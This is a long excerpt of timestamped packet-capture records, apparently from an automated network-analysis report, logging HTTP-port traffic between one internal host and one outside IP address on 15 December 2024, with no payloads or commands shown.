                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.644649982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.644668102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.644684076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.645586014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.645610094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.645622015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.645634890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.645646095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.645657063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.645668983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.645680904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.645693064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.645700932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.645706892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.645730972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.645749092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646290064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646310091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646325111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646385908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646398067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646405935 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646409988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646434069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646450043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646786928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646800995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646812916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646891117 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646900892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646913052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646924973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646938086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646945953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646950960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646966934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646975040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646984100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.646987915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.647016048 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.647840023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.647854090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.647866011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.647876978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.647891045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.647902966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.647916079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.647929907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.647941113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.647953033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.647954941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.647968054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.647984982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.648701906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.648715973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.648725986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.648740053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.648751974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.648766041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.648785114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.648797035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.648809910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.648818016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.648825884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.648833036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.648869991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.649523020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.649655104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.649667978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.649677992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.649705887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.649717093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.649729967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.649741888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.649755001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.649755955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.649766922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.649792910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.649804115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.650671005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.650708914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.650723934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.650763035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.650840044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.650851011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.650851965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.650865078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.650876045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.650890112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.650902987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.650917053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.650924921 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.650945902 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.651626110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.651757956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.651770115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.651782036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.651793957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.651810884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.651823044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.651837111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.651849031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.651861906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.651881933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.651896954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.652715921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.652729988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.652740002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.652750969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.652764082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.652776957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.652791023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.652803898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.652816057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.652829885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.652858019 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.652874947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.653526068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.653537989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.653548956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.653562069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.653575897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.653588057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.653599977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.653613091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.653625011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.653636932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.653672934 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.653698921 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.654309988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.654323101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.654361963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.654375076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.654386997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.654414892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.654426098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.654436111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.654438972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.654453993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.654457092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.654468060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.654474020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.654504061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.655136108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.655148029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.655158997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.655237913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.655250072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.655261993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.655262947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.655275106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.655276060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.655287981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.655299902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.655311108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.655318975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.655343056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.655355930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.656039000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.656059980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.656085968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.656177044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.656181097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.656193972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.656210899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.656224012 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.656227112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.656239986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.656249046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.656254053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.656265974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.656276941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.656302929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.657321930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.657334089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.657346010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.657360077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.657372952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.657387018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.657399893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.657413960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.657426119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.657439947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.657453060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.657494068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.657999992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658013105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658102036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658113956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658127069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658127069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658143044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658154964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658164024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658169031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658180952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658194065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658194065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658215046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658229113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658853054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658864975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658874989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658886909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658902884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658915997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658926964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658940077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658952951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658968925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658979893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.658981085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.659022093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.659634113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.659653902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.659671068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.659703970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.659722090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.659775972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.659795046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.659806967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.659818888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.659832001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.659842968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.659852982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.659857035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.659883976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.660537004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.660603046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.660615921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.660711050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.660721064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.660722971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.660736084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.660742044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.660752058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.660763979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.660770893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.660778999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.660794020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.660795927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.660815954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.704112053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.791800976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.791836023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.791976929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.792135954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.792310953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.792479992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.792928934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.793034077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.793121099 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.793925047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.794053078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.794269085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.794851065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.794929981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.795026064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.795610905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.795706034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.796044111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.796318054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.796408892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.796617031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.797152042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.797236919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.797312021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.798058987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.798151016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.798261881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.798808098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.798926115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.799074888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.799617052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.799761057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.799901009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.800656080 CET8049709185.81.68.147192.168.2.8
